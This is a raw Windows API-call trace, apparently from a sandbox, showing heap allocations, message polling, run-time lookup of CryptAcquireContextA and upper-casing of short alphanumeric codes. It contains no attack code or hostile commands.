[0199.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0199.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0199.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0199.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0199.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0199.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0199.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466df0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0199.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0199.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0199.143] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0199.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0199.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0199.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466df0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0199.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0199.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0199.144] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0199.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0199.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0199.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b36c0 | out: hHeap=0x25c0000) returned 1 [0199.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0199.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0199.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0199.144] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad6480) returned 1 [0199.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0199.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0199.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0199.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0199.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0199.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0199.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0199.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0199.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0199.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0199.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0199.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0199.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0199.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0199.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0199.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0199.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0199.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0199.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0199.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0199.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0199.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0199.147] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0199.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0199.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0199.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0199.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0199.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0199.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0199.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0199.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0199.147] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0199.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0199.148] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0199.148] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0199.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0199.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0199.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0199.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0199.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0199.148] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0199.148] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.148] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0199.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0199.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0199.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0199.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0199.148] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.148] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.148] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.148] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0199.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0199.149] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0199.149] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0199.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0199.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0199.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0199.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0199.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0199.149] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0199.149] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.149] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0199.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0199.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0199.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0199.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0199.149] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.149] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0199.150] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0199.150] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0199.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0199.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0199.150] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0199.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0199.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0199.150] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0199.151] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0199.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0199.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0199.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0199.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0199.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0199.151] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0199.151] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.151] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0199.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0199.151] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0199.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0199.151] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0199.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0199.151] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0199.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0199.152] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0199.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0199.152] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0199.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0199.152] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0199.152] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0199.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0199.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0199.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0199.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0199.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0199.152] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0199.152] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.152] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0199.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0199.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0199.152] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0199.153] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0199.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0199.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0199.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0199.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0199.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0199.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0199.153] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0199.153] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0199.153] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0199.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0199.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0199.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0199.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0199.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0199.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0199.153] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.153] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0199.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0199.153] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0199.154] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0199.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0199.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0199.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0199.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0199.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0199.154] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0199.154] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.154] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0199.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0199.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0199.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0199.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0199.154] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.154] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0199.154] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0199.154] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0199.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0199.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0199.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0199.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0199.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0199.155] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.155] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.155] 